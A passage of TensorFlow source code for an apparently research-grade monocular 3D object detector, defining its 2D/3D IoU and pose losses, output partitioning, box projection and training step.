x2 = tf.reduce_max(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0]
y1 = tf.reduce_min(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
y2 = tf.reduce_max(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
# print(x1.shape)
return bbox3D8Points, tf.stack([x1,y1,x2,y2], axis=-1) # (b,gr,gc,pr,4)
def _calcXYZ(self):
len_grid_x, len_grid_y = tf.cast(tf.shape(self._offset_x)[2], tf.float32), tf.cast(tf.shape(self._offset_x)[1], tf.float32)
# image_size : (row, col)
objCenter2D_xz = (self._bbox2D_xy[..., 0] + self._offset_x) / len_grid_x * self._image_size[..., 0] * self._localZ[..., 0]
objCenter2D_yz = (self._bbox2D_xy[..., 1] + self._offset_y) / len_grid_y * self._image_size[..., 1] * self._localZ[..., 0]
objCenter2D_xyz = tf.stack([objCenter2D_xz, objCenter2D_yz, self._localZ[...,0], tf.ones_like(self._localZ[...,0])], axis=-1)
self._localXYZ = self._matmul4x1(self._P2_inv_gt, objCenter2D_xyz)[..., 0:3]
def _calcBbox3Dand2D(self):
b, gr, gc, pr, _ = tf.shape(self._cos)
zx_norm = tf.sqrt(tf.square(self._localXYZ[..., -1]) + tf.square(self._localXYZ[..., 0]))
s_ray, c_ray = tf.expand_dims(self._localXYZ[..., 0] / zx_norm, axis=-1), tf.expand_dims(self._localXYZ[..., -1] / zx_norm, axis=-1)
s_ray, c_ray = tf.constant(s_ray.numpy()), tf.constant(c_ray.numpy())
self._sin_ry = s_ray * self._cos + c_ray * self._sin
self._cos_ry = c_ray * self._cos - s_ray * self._sin
# self._cos_ry, self._sin_ry = self._cos, self._sin
zero = tf.zeros_like(self._cos_ry)
one = tf.ones_like(self._cos_ry)
self._R = tf.reshape(tf.concat([self._cos_ry, zero, self._sin_ry,
zero, one, zero,
-self._sin_ry, zero, self._cos_ry]
, axis=-1), [b, gr, gc, pr, 3, 3])
self._bbox3D8Points, self._bbox2D_dim = self._get3DBboxAnd2DPorj(self._P2_gt, self._R, self._localXYZ, tf.constant(self._bbox3D_dim.numpy()))
# self._bbox3D8Points
# self._bbox2D_dim
#
def _getbbox2DIOU(self):
xmin_gt, ymin_gt, xmax_gt, ymax_gt = self._bbox2D_dim_gt[..., 0], self._bbox2D_dim_gt[..., 1], self._bbox2D_dim_gt[..., 2], self._bbox2D_dim_gt[..., 3]
xmin, ymin, xmax, ymax = self._bbox2D_dim[..., 0], self._bbox2D_dim[..., 1], self._bbox2D_dim[..., 2], self._bbox2D_dim[..., 3]
xmin_int = tf.math.maximum(xmin_gt, xmin)
ymin_int = tf.math.maximum(ymin_gt, ymin)
xmax_int = tf.math.minimum(xmax_gt, xmax)
ymax_int = tf.math.minimum(ymax_gt, ymax)
intersection_xlen = tf.maximum(xmax_int - xmin_int, 0.0)
intersection_ylen = tf.maximum(ymax_int - ymin_int, 0.0)
# print(intersection_xlen)
# print(self._bbox2D_tile)
intersection_area = intersection_xlen * intersection_ylen
box_gt_area = (xmax_gt - xmin_gt) * (ymax_gt - ymin_gt)
box_pr_area = (xmax - xmin) * (ymax - ymin)
union_area = tf.maximum(box_gt_area + box_pr_area - intersection_area, 1e-9)
self._IOU = tf.clip_by_value(intersection_area/union_area, 0., 1.)
xmin_out = tf.minimum(xmin_gt, xmin)
ymin_out = tf.minimum(ymin_gt, ymin)
xmax_out = tf.maximum(xmax_gt, xmax)
ymax_out = tf.maximum(ymax_gt, ymax)
outer_xlen = tf.maximum(xmax_out - xmin_out, 0.)
outer_ylen = tf.maximum(ymax_out - ymin_out, 0.)
c2 = tf.square(outer_xlen) + tf.square(outer_ylen) # sqr of diagonal length of max-outer box
c2 = tf.maximum(c2, 1e-9)
box_gt_x = (xmax_gt + xmin_gt) / 2.
box_gt_y = (ymax_gt + ymin_gt) / 2.
box_pr_x = (xmax + xmin) / 2.
box_pr_y = (ymax + ymin) / 2.
center_diff2 = tf.square(box_gt_x - box_pr_x) + tf.square(box_gt_y - box_pr_y)
self._RDIOU = center_diff2 / c2
def _bbox2DLoss(self):
# tile shape = (batch, gridy, gridx, 2*predictornum, hwxy)
square_d_xy = tf.reduce_sum(tf.square(self._bbox2D_xy - self._bbox2D_xy_gt), axis=-1)
h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
obj_mask = tf.reshape(self._objness_gt, tf.shape(self._objness_gt)[:-1])
d_h = obj_mask * (h_pred - h_gt)
d_w = obj_mask * (w_pred - w_gt)
self._box_loss_scale = tf.constant((2. - w_gt * h_gt).numpy())
xy_loss = obj_mask * self._box_loss_scale * square_d_xy
hw_loss = obj_mask * self._box_loss_scale * (tf.square(d_h) + tf.square(d_w))
self._loss_bbox2D_xy = tf.reduce_sum(xy_loss, axis=[1,2,3])
self._loss_bbox2D_hw = tf.reduce_sum(hw_loss, axis=[1, 2, 3])
def _objnessLoss(self):
d_objness = -self._objness_gt * tf.math.log(self._objness + 1e-10) # * tf.square(tf.square(self._sin) + tf.square(self._cos))
d_no_objness = - (1.0-self._objness_gt) * tf.math.log(1.0-self._objness + 1e-10)
# d_no_objness = self._ignore_mask * d_no_objness[..., 0]
d_no_objness = d_no_objness[..., 0]
self._loss_objness = tf.reduce_sum(d_objness, axis=[1, 2, 3, 4])
self._loss_no_objness = tf.reduce_sum(d_no_objness, axis=[1, 2, 3])
def _smoothL1(self, x_src, x_trg, cond):
# return tf.losses.huber(x_src, x_trg, cond)
return tf.where(tf.abs(x_src - x_trg) > cond, tf.abs(x_src - x_trg) - 0.5 * cond, 0.5 / cond * tf.square(x_src - x_trg))
def _bbox2DLossCIOU(self):
obj_mask = self._objness_gt[..., 0]
pi = 3.14159265358979323846
# v = ((atan(w/h_gt) - atan(w/h_pr)) / (pi/2) )^2
# bbox = hwxy
h_pred = self._bbox2D_dim[..., 3] - self._bbox2D_dim[..., 1]
w_pred = self._bbox2D_dim[..., 2] - self._bbox2D_dim[..., 0]
h_gt = self._bbox2D_dim_gt[..., 3] - self._bbox2D_dim_gt[..., 1]
w_gt = self._bbox2D_dim_gt[..., 2] - self._bbox2D_dim_gt[..., 0]
ar_gt = w_gt / (h_gt + 1e-9)
ar = w_pred / (h_pred + 1e-9)
v = 4. / (pi * pi) * tf.square(tf.atan(ar_gt) - tf.atan(ar))
alpha = v / (1. - self._IOU + v + 1e-9)
loss_CIOU = obj_mask * (1. - self._IOU + self._RDIOU + alpha * v)
# loss_CIOU = obj_mask * (1. - self._IOU)
bbox_coor_loss = obj_mask * tf.reduce_sum(self._smoothL1(self._bbox2D_dim, self._bbox2D_dim_gt, 1e-4), axis=-1)
# bbox_coor_loss = obj_mask * tf.reduce_sum(tf.square(self._bbox2D_dim - self._bbox2D_dim_gt), axis=-1)
self._loss_bbox2D_CIOU = tf.reduce_sum(loss_CIOU + bbox_coor_loss, axis=[1, 2, 3])
# loss_IOU = obj_mask * (1. - self._IOU)
# self._loss_bbox2D_IOU = tf.reduce_sum(loss_IOU, axis=[1,2,3])
def _bbox3DLoss(self):
# self._loss_bbox3D = tf.reduce_sum(self._objness_gt * tf.square(self._bbox3D_dim_gt-self._bbox3D_dim), axis=[1,2,3,4])
self._loss_bbox3D = tf.reduce_sum(self._objness_gt * self._smoothL1(self._bbox3D_dim_gt, self._bbox3D_dim, cond=1e-5), axis=[1,2,3,4])
# self._loss_bbox3D = tf.reduce_sum(self._objness_gt * tf.expand_dims(self._box_loss_scale, axis=-1) * self._smoothL1(self._bbox3D_dim_gt, self._bbox3D_dim, 0.01), axis=[1, 2, 3, 4])
# # obj_mask = tf.reshape(self._obj_mask, tf.shape(self._obj_mask)[:-1])
# d = self._obj_mask * (self._bbox3D_tile - self._bbox3D_gt_tile)
#
# obj_mask = tf.reshape(self._obj_mask, tf.shape(self._obj_mask)[:-1])
# box_loss_scale = obj_mask * (2. - self._bbox2D_gt_tile[..., 0] * self._bbox2D_gt_tile[..., 1])
# d = box_loss_scale * tf.reduce_sum(d, axis=-1)
#
# # d shape = (batch, gridy, gridx, 2*predictornum, whl)
# self._loss_bbox3D = tf.reduce_sum(tf.square(d), axis=[1, 2, 3])
def _bbox3DIoULoss(self):
IoU_3d = cal_iou_3d(box3d1=self._bbox3D8Points_gt, box3d2=self._bbox3D8Points,
lhw1=self._bbox3D_dim_gt, lhw2=self._bbox3D_dim)
# print(IoU_3d.shape)
obj_mask = self._objness_gt[..., 0]
# print(obj_mask.shape)
self._loss_bbox3D_IoU = obj_mask * (1. - IoU_3d)
self._loss_bbox3D_IoU = tf.reduce_sum(self._loss_bbox3D_IoU , axis=[1, 2, 3])
bbox_coor_loss = tf.reduce_sum(self._smoothL1(self._bbox3D8Points, self._bbox3D8Points_gt, 0.01), axis=[4, 5])
# bbox_coor_loss = tf.reduce_sum(tf.square(self._bbox3D8Points - self._bbox3D8Points_gt), axis=[4, 5])
# print(bbox_coor_loss.shape)
bbox_coor_loss = tf.reduce_sum(obj_mask * bbox_coor_loss, axis=[1, 2, 3])
# print(bbox_coor_loss.shape)
self._loss_bbox3D_IoU += bbox_coor_loss
# print(tf.reduce_sum(IoU_3d) / tf.reduce_sum(obj_mask))
def _localXYZLoss(self):
# loss_localXYZ_Bayesian = tf.square(self._localXYZ - self._localXYZ_gt) / (tf.exp(self._localXYZ_log_var) + 1e-9) + self._localXYZ_log_var
# loss_localXYZ_Bayesian = self._localXYZ_log_var_tile
# loss_localXYZ_Euclidian = tf.abs(self._localXYZ-self._localXYZ_gt)
# loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ, self._localXYZ_gt, 0.001) * tf.expand_dims(self._box_loss_scale, axis=-1)
# loss_localXYZ_Euclidian = self._smoothL1(self._localXYZ, self._localXYZ_gt, 0.001)
# loss_localXYZ_Euclidian = tf.square(self._localXYZ - self._localXYZ_gt)# * tf.expand_dims(self._box_loss_scale, axis=-1)
loss_localXYZ_Euclidian = tf.expand_dims(tf.square(self._localZ[..., 0] - self._localXYZ_gt[..., 2]), axis=-1)# * tf.expand_dims(self._box_loss_scale, axis=-1)
# loss_localXYZ = 0.1 * loss_localXYZ_Bayesian + 100.0 * loss_localXYZ_Euclidian
# self._loss_localXYZ = tf.reduce_sum(self._objness_gt * 0.1 * loss_localXYZ_Bayesian, axis=[1, 2, 3, 4])
self._loss_localXYZ = tf.reduce_sum((self._objness_gt * loss_localXYZ_Euclidian)[..., -1], axis=[1, 2, 3])
def _getEV(self, sin, cos, radLogVar):
Esin = tf.exp(-tf.exp(radLogVar) / 2.0) * sin
Ecos = tf.exp(-tf.exp(radLogVar) / 2.0) * cos
Varsin = 0.5 - 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (1.0 - 2.0 * sin * sin) - tf.exp(
-tf.exp(radLogVar)) * sin * sin
Varcos = 0.5 + 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (2.0 * cos * cos - 1.0) - tf.exp(
-tf.exp(radLogVar)) * cos * cos
logVarsin = tf.math.log(Varsin + 1e-7)
logVarcos = tf.math.log(Varcos + 1e-7)
return Esin, Ecos, logVarsin, logVarcos
def _poseLoss(self):
Esin, Ecos, logvarsin, logvarcos = self._getEV(sin=self._sin, cos=self._cos, radLogVar=tf.math.log(self._rad_var))
Esin_gt, Ecos_gt, logvarsin_gt, logvarcos_gt = self._getEV(sin=self._sin_gt, cos=self._cos_gt, radLogVar=tf.math.log(self._rad_var))
# loss_sin_kl = kl_loss(mean=Esin, logVar=logvarsin, mean_target=Esin_gt, logVar_target=logvarsin_gt)
# loss_cos_kl = kl_loss(mean=Ecos, logVar=logvarcos, mean_target=Ecos_gt, logVar_target=logvarcos_gt)
self._loss_sincos = tf.square(Esin-Esin_gt)/tf.exp(logvarsin_gt) + tf.square(Ecos-Ecos_gt)/tf.exp(logvarcos_gt)
self._loss_sincos += tf.square(1. - (self._sin * self._sin_gt + self._cos * self._cos_gt)) # inner product
self._loss_sincos += tf.square(self._sin - self._sin_gt) + tf.square(self._cos - self._cos_gt) # cross product, 1st and 2nd component
self._loss_sincos += tf.square(self._sin * self._cos_gt - self._cos * self._sin_gt) # cross product, 3rd component
scsquaresum = tf.square(self._sin) + tf.square(self._cos)
self._loss_sincos1 = tf.square(1. - scsquaresum)
# self._loss_sincos_bayesian = tf.reduce_sum(self._objness_gt * self._loss_sincos_bayesian, axis=[1, 2, 3, 4])
# obj_mask = self._objness_gt[..., 0]
# self._loss_sincos_kl = tf.reduce_sum(obj_mask * (loss_sin_kl + loss_cos_kl), axis=[1, 2, 3])
self._loss_sincos = tf.reduce_sum(self._objness_gt * self._loss_sincos, axis=[1, 2, 3, 4])
self._loss_sincos1 = tf.reduce_sum(self._objness_gt * self._loss_sincos1, axis=[1, 2, 3, 4])
# + 0.1 * tf.reduce_mean(self._loss_sincos1, axis=[1, 2, 3, 4])
def _classificationLoss(self):
self._category_pred = tf.nn.softmax(self._category_pred)
self._loss_category = -tf.reduce_sum(self._category_gt * tf.math.log(self._category_pred + 1e-9), axis=-1)
def _selectObjAndSampling(self):
car_mask = tf.cast(self._objnessCar_gt[..., 0], tf.int32) # (batch, row, col)
self._latent_mean_car_sel = tf.dynamic_partition(self._latent_mean, car_mask, 2)[1]
self._latent_log_var_car_sel = tf.dynamic_partition(self._latent_log_var, car_mask, 2)[1]
self._z_car = sampling(mu=self._latent_mean_car_sel, logVar=self._latent_log_var_car_sel)
obj_mask = tf.cast(self._objness_gt[..., 0], tf.int32)
self._latent_mean_sel = tf.dynamic_partition(self._latent_mean, obj_mask, 2)[1]
self._latent_log_var_sel = tf.dynamic_partition(self._latent_log_var, obj_mask, 2)[1]
self._z = sampling(mu=self._latent_mean_sel, logVar=self._latent_log_var_sel)
def _objLatentAndShapeLoss(self):
self._loss_latents_kl = kl_loss(mean=self._latent_mean_car_sel, logVar=self._latent_log_var_car_sel,
mean_target=self._inst_mean_prior, logVar_target=self._inst_log_var_prior)
self._loss_shape = binary_loss(xPred=self._outputs, xTarget=self._output_images_gt, gamma=0.60, b_range=False)
def _priorRegLoss(self):
self._loss_prior_reg = regulizer_loss(z_mean=self._inst_mean_prior,
z_logVar=self._inst_log_var_prior,
dist_in_z_space=2.0 * self._enc_backbone_str['latent_dim'])
def _objnessEval(self):
self._obj_prb = (
tf.reduce_sum(self._objness_gt * self._objness, axis=[1, 2, 3, 4])
/ tf.reduce_sum(self._objness_gt, axis=[1, 2, 3, 4]))
self._no_obj_prb = (
tf.reduce_sum((1.0 - self._objness_gt) * (1.0 - self._objness), axis=[1, 2, 3, 4])
/ tf.reduce_sum(1.0 - self._objness_gt, axis=[1, 2, 3, 4]))
class nolbo_bayesian(object):
def __init__(self, nolbo_structure,
backbone_style=None, encoder_backbone=None,
learning_rate=1e-4,
IoU2D_loss=True, IoU3D_loss=True, exp=False,
solver='adam'):
self._enc_backbone_str = nolbo_structure['encoder_backbone']
# self._name = nolbo_structure['name']
# self._predictor_num = nolbo_structure['predictor_num']
# self._bbox2D_dim = nolbo_structure['bbox2D_dim']
# self._bbox3D_dim = nolbo_structure['bbox3D_dim']
# self._orientation_dim = nolbo_structure['orientation_dim']
# self._inst_dim = nolbo_structure['inst_dim']
# self._z_inst_dim = nolbo_structure['z_inst_dim']
self._enc_head_str = nolbo_structure['encoder_head']
# self._dec_str = nolbo_structure['decoder']
# self._prior_str = nolbo_structure['prior']
self._rad_var = (15.0/180.0 * 3.141593) ** 2
self._backbone_style = backbone_style
self._encoder_backbone = encoder_backbone
self._IoU2D_loss, self._IoU3D_loss = IoU2D_loss, IoU3D_loss
self._exp = exp
# # self._strategy = strategy
# self._strategy = tf.distribute.MirroredStrategy()
# self._BATCH_SIZE_PER_REPLICA = BATCH_SIZE_PER_REPLICA
# self._GLOBAL_BATCH_SIZE = self._BATCH_SIZE_PER_REPLICA * self._strategy.num_replicas_in_sync
self._buildModel()
if solver == 'adam' or solver == 'Adam':
self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
elif solver == 'sgd' or solver == 'SGD':
self._optimizer = tf.keras.optimizers.SGD(learning_rate=learning_rate, momentum=0.9, decay=0.0005)
def _buildModel(self):
print('build Models...')
if self._encoder_backbone == None:
self._encoder_backbone = self._backbone_style(name=self._enc_backbone_str['name'])
#==============set encoder head
self._encoder_head = darknet.head2D(name=self._enc_head_str['name'],
input_shape=self._encoder_backbone.output_shape[1:],
output_dim=self._enc_head_str['output_dim'],
filter_num_list=self._enc_head_str['filter_num_list'],
filter_size_list=self._enc_head_str['filter_size_list'],
last_pooling=None, activation=self._enc_head_str['activation'])
# #==============set decoder3D
# self._decoder = ae3D.decoder3D(structure=self._dec_str)
# self._priornet = priornet.priornet(structure=self._prior_str)
print('done')
def fit(self, inputs):
self._getInputs(inputs=inputs)
with tf.GradientTape() as tape:
# get encoder output and loss
self._input_images = self._input_images / 255.
self._enc_output = self._encoder_backbone(self._input_images, training=True)
self._enc_output = self._encoder_head(self._enc_output, training=True)
self._calcEncoderOutput()
# # get (priornet, decoder) output and loss
# self._inst_mean_prior, self._inst_log_var_prior = self._priornet(self._inst_vectors_gt, training=True)
# self._selectObjFromTile()
# self._latents = sampling(mu=self._inst_mean_sel, logVar=self._inst_log_var_sel)
# self._outputs = self._decoder(self._latents, training=True)
self._getEncoderLoss()
# self._getDecoderAndPriorLoss()
# get network parameter regulization loss
# reg_loss = tf.reduce_sum(self._encoder_head.losses + self._encoder_backbone.losses + self._decoder.losses + self._priornet.losses)
reg_loss = tf.reduce_sum(self._encoder_backbone.losses + self._encoder_head.losses)
self._loss_objness = tf.reduce_mean(self._loss_objness, axis=0)
# print(self._loss_objness.shape)
self._loss_no_objness = tf.reduce_mean(self._loss_no_objness, axis=0)
self._loss_bbox2D_hw = tf.reduce_mean(self._loss_bbox2D_hw, axis=0)
self._loss_bbox2D_xy = tf.reduce_mean(self._loss_bbox2D_xy, axis=0)
self._loss_bbox2D_CIOU = tf.reduce_mean(self._loss_bbox2D_CIOU, axis=0)
self._loss_bbox3D = tf.reduce_mean(self._loss_bbox3D, axis=0)
self._loss_bbox3D_IoU = tf.reduce_mean(self._loss_bbox3D_IoU, axis=0)
self._loss_localXYZ_Bayesian = tf.reduce_mean(self._loss_localXYZ_Bayesian, axis=0)
self._loss_localXYZ_Euclidian = tf.reduce_mean(self._loss_localXYZ_Euclidian, axis=0)
# self._loss_shape = tf.reduce_mean(self._loss_shape, axis=0)
# self._loss_latents_kl = tf.reduce_mean(self._loss_latents_kl, axis=0)
# self._loss_prior_reg = tf.reduce_mean(self._loss_prior_reg, axis=0)
self._loss_sincos_bayesian = tf.reduce_mean(self._loss_sincos_bayesian, axis=0)
self._loss_sincos = tf.reduce_mean(self._loss_sincos, axis=0)
self._loss_sincos1 = tf.reduce_mean(self._loss_sincos1, axis=0)
# total loss
total_loss = (
50.0 * self._loss_objness + 0.01 * self._loss_no_objness
+ 20.0 * self._loss_bbox3D + 20.0 * self._loss_bbox2D_xy
+ 0.001 * self._loss_localXYZ_Bayesian + self._loss_localXYZ_Euclidian
# + self._loss_latents_kl
+ 100.0 * self._loss_sincos + 1000. * self._loss_sincos1
+ 0.001 * self._loss_sincos_bayesian
# + reg_loss
)
if self._IoU2D_loss:
total_loss += 20.0 * (self._loss_bbox2D_CIOU + 0.1 * self._loss_bbox2D_hw)
if self._IoU3D_loss:
total_loss += self._loss_bbox3D_IoU
trainable_variables = self._encoder_backbone.trainable_variables + self._encoder_head.trainable_variables
grads = tape.gradient(total_loss, trainable_variables)
self._optimizer.apply_gradients(zip(grads, trainable_variables))
# ==== evaluations
self._objnessEval()
self._obj_prb = tf.reduce_mean(self._obj_prb)
self._no_obj_prb = tf.reduce_mean(self._no_obj_prb)
# TP, FP, FN = voxelPrecisionRecall(xTarget=self._output_images_gt, xPred=self._outputs)
# pr = tf.reduce_mean(TP / (TP + FP + 1e-10))
# rc = tf.reduce_mean(TP / (TP + FN + 1e-10))
return self._loss_objness, self._loss_no_objness,\
self._loss_bbox2D_CIOU, self._loss_bbox3D_IoU, \
self._loss_bbox3D, self._loss_localXYZ_Euclidian, self._loss_localXYZ_Bayesian, \
self._loss_sincos, self._loss_sincos1, self._loss_sincos_bayesian,\
self._obj_prb, self._no_obj_prb
def saveEncoderBackbone(self, save_path):
file_name = self._enc_backbone_str['name']
self._encoder_backbone.save_weights(os.path.join(save_path, file_name))
def saveEncoderHead(self, save_path):
file_name = self._enc_head_str['name']
self._encoder_head.save_weights(os.path.join(save_path, file_name))
def saveEncoder(self, save_path):
self.saveEncoderBackbone(save_path=save_path)
self.saveEncoderHead(save_path=save_path)
def saveModel(self, save_path):
self.saveEncoder(save_path=save_path)
def loadEncoderBackbone(self, load_path, file_name=None):
if file_name == None:
file_name = self._enc_backbone_str['name']
self._encoder_backbone.load_weights(os.path.join(load_path, file_name))
def loadEncoderHead(self, load_path, file_name=None):
if file_name == None:
file_name = self._enc_head_str['name']
self._encoder_head.load_weights(os.path.join(load_path, file_name))
def loadEncoder(self, load_path):
self.loadEncoderBackbone(load_path=load_path)
self.loadEncoderHead(load_path=load_path)
def loadModel(self, load_path):
self.loadEncoder(load_path=load_path)
def _getInputs(self, inputs):
self._offset_x, self._offset_y,\
self._input_images,\
self._objness_gt, self._bbox2D_dim_gt, self._bbox2D_xy_gt, self._bbox3D_dim_gt,\
self._localXYZ_gt,\
self._rad_gt, \
self._bbox3D8Points_gt,\
self._image_size, \
self._P2_gt, self._P2_inv_gt,\
self._anchor_z, self._anchor_bbox3D = inputs
# self._output_images_gt, self._inst_vectors_gt, \
self._offset_x = tf.convert_to_tensor(self._offset_x)
self._offset_y = tf.convert_to_tensor(self._offset_y)
self._input_images = tf.convert_to_tensor(self._input_images)
self._objness_gt = tf.convert_to_tensor(self._objness_gt)
self._bbox2D_dim_gt = tf.convert_to_tensor(self._bbox2D_dim_gt)
self._bbox2D_xy_gt = tf.convert_to_tensor(self._bbox2D_xy_gt)
self._bbox3D_dim_gt = tf.convert_to_tensor(self._bbox3D_dim_gt)
self._localXYZ_gt = tf.convert_to_tensor(self._localXYZ_gt)
self._rad_gt = tf.convert_to_tensor(self._rad_gt)
self._bbox3D8Points_gt = tf.convert_to_tensor(self._bbox3D8Points_gt)
# print(self._bbox3D8Points_gt.shape)
self._image_size = tf.convert_to_tensor(self._image_size)
self._P2_gt = tf.convert_to_tensor(self._P2_gt)
self._P2_inv_gt = tf.convert_to_tensor(self._P2_inv_gt)
# self._output_images_gt = tf.convert_to_tensor(self._output_images_gt)
# self._inst_vectors_gt = tf.convert_to_tensor(self._inst_vectors_gt)
self._anchor_z = tf.convert_to_tensor(self._anchor_z)
self._anchor_bbox3D = tf.convert_to_tensor(self._anchor_bbox3D)
self._sin_gt = tf.sin(self._rad_gt)
self._cos_gt = tf.cos(self._rad_gt)
def _calcEncoderOutput(self):
self._encOutPartitioning()
self._calcXYZ()
self._calcBbox3Dand2D()
# self._createTiles()
self._getbbox2DIOU()
# self._getObjMaskAndObjGT()
def _getEncoderLoss(self):
self._bbox2DLoss()
self._objnessLoss()
self._bbox2DLossCIOU()
self._bbox3DLoss()
self._bbox3DIoULoss()
self._localXYZLoss()
self._poseLoss()
# def _getDecoderAndPriorLoss(self):
# self._objLatentAndShapeLoss()
# self._priorRegLoss()
def _encOutPartitioning(self):
pr_num = self._enc_backbone_str['predictor_num']
self._objness, self._bbox2D_xy, self._bbox3D_dim = [], [], []
self._localZ, self._localZ_logvar = [], []
self._sin, self._cos, self._rad_logvar = [], [], []
part_start = 0
part_end = part_start
for predIndex in range(pr_num):
# objectness
part_end += 1
self._objness.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['bbox2DXY_dim']
self._bbox2D_xy.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['bbox3D_dim']
self._bbox3D_dim.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['localXYZ_dim']
self._localZ.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['localXYZ_dim']
self._localZ_logvar.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['orientation_dim']
self._sin.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['orientation_dim']
self._cos.append(self._enc_output[..., part_start:part_end])
part_start = part_end
part_end += self._enc_backbone_str['orientation_dim']
self._rad_logvar.append(self._enc_output[..., part_start:part_end])
part_start = part_end
# print(part_end)
self._objness = tf.sigmoid(tf.transpose(tf.stack(self._objness), [1, 2, 3, 0, 4]))
self._bbox2D_xy = tf.sigmoid(tf.transpose(tf.stack(self._bbox2D_xy), [1, 2, 3, 0, 4]))
self._bbox3D_dim = tf.transpose(tf.stack(self._bbox3D_dim), [1,2,3,0,4])
self._bbox3D_dim = tf.exp(self._bbox3D_dim) * self._anchor_bbox3D
# print(self._bbox3D_dim.shape)
self._localZ = tf.transpose(tf.stack(self._localZ), [1, 2, 3, 0, 4])
if self._exp:
self._localZ = tf.exp(self._localZ) * tf.expand_dims(self._anchor_z, axis=-1)
else:
self._localZ = self._localZ + tf.expand_dims(self._anchor_z, axis=-1)
self._localZ_logvar = tf.clip_by_value(tf.transpose(tf.stack(self._localZ_logvar), [1, 2, 3, 0, 4]), clip_value_min=-2.0, clip_value_max=2.0)
self._sin = tf.tanh(tf.transpose(tf.stack(self._sin), [1, 2, 3, 0, 4]))
self._cos = tf.tanh(tf.transpose(tf.stack(self._cos), [1, 2, 3, 0, 4]))
self._rad_logvar = tf.clip_by_value(tf.transpose(tf.stack(self._rad_logvar), [1, 2, 3, 0, 4]), clip_value_min=-1.0, clip_value_max=1.0)
def _matmul3x1(self, a, b):
# c0 = a[..., 0, 0] * b[..., 0] + a[..., 0, 1] * b[..., 1] + a[..., 0, 2] * b[..., 2]
# c1 = a[..., 1, 0] * b[..., 0] + a[..., 1, 1] * b[..., 1] + a[..., 1, 2] * b[..., 2]
# c2 = a[..., 2, 0] * b[..., 0] + a[..., 2, 1] * b[..., 1] + a[..., 2, 2] * b[..., 2]
# return tf.stack([c0, c1, c2], axis=-1)
c = tf.reduce_sum(a * tf.expand_dims(b, -2), axis=-1)
return c
def _matmul4x1(self, a, b):
# c0 = a[..., 0, 0] * b[..., 0] + a[..., 0, 1] * b[..., 1] + a[..., 0, 2] * b[..., 2] + a[..., 0, 3] * b[..., 3]
# c1 = a[..., 1, 0] * b[..., 0] + a[..., 1, 1] * b[..., 1] + a[..., 1, 2] * b[..., 2] + a[..., 1, 3] * b[..., 3]
# c2 = a[..., 2, 0] * b[..., 0] + a[..., 2, 1] * b[..., 1] + a[..., 2, 2] * b[..., 2] + a[..., 2, 3] * b[..., 3]
# c3 = a[..., 3, 0] * b[..., 0] + a[..., 3, 1] * b[..., 1] + a[..., 3, 2] * b[..., 2] + a[..., 3, 3] * b[..., 3]
# return tf.stack([c0, c1, c2, c3], axis=-1)
c = tf.reduce_sum(a * tf.expand_dims(b, -2), axis=-1)
return c
def _get3DBboxAnd2DPorj(self, projmat, R, t, lhw):
# projmat : (batch, gridrow, girdcol, pred, 4x4)
# R : (batch, gridrow, gridcol, pred, 3x3)
# t : (batch, gridrow, gridcol, pred, 3)
# lhw : (batch, gridrow, gridcol, pred, 3)
dx, dy, dz = -lhw[...,0]/2., -lhw[...,1]/2., -lhw[...,2]/2.
dxdydz = []
for i in range(2):
dy = -1. * dy
for j in range(2):
dx = -1. * dx
for k in range(2): # [x,y,z], [
dz = -1. * dz
dxdydz.append(tf.stack([dx,dy,dz], axis=-1)) #(8, b,gr,gc,pr,3)
dxdydz = tf.transpose(tf.stack(dxdydz), [1,2,3,4,0,5]) #(b,gr,gc,pr,8,3)
R_tile = tf.transpose(tf.stack([R]*8), [1,2,3,4,0,5,6])
t_tile = tf.transpose(tf.stack([t]*8), [1,2,3,4,0,5])
bbox3D8Points = self._matmul3x1(R_tile, dxdydz) + t_tile #(b,gr,gc,pr,8,3)
x_4d = tf.concat([bbox3D8Points, tf.expand_dims(tf.ones_like(dxdydz[...,0]),axis=-1)], axis=-1) #(b,gr,gc,pr,8,4)
projmat_tile = tf.transpose(tf.stack([projmat]*8), [1,2,3,4,0,5,6])
bbox3D8PointsProj = self._matmul4x1(projmat_tile, x_4d)
bbox3D8PointsProj = bbox3D8PointsProj[..., :2] / (tf.expand_dims(bbox3D8PointsProj[..., 2], axis=-1) + 1e-9)
# print(bbox3D8PointsProj.shape)
# select proj point
x1 = tf.reduce_min(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0] # (b,gr,gc,pr)
x2 = tf.reduce_max(bbox3D8PointsProj[..., 0], axis=-1) / self._image_size[..., 0]
y1 = tf.reduce_min(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
y2 = tf.reduce_max(bbox3D8PointsProj[..., 1], axis=-1) / self._image_size[..., 1]
# print(x1.shape)
return bbox3D8Points, tf.stack([x1,y1,x2,y2], axis=-1) # (b,gr,gc,pr,4)
def _calcXYZ(self):
len_grid_x, len_grid_y = tf.cast(tf.shape(self._offset_x)[2], tf.float32), tf.cast(tf.shape(self._offset_x)[1], tf.float32)
# image_size : (row, col)
objCenter2D_xz = (self._bbox2D_xy[..., 0] + self._offset_x) / len_grid_x * self._image_size[..., 0] * self._localZ[..., 0]
objCenter2D_yz = (self._bbox2D_xy[..., 1] + self._offset_y) / len_grid_y * self._image_size[..., 1] * self._localZ[..., 0]
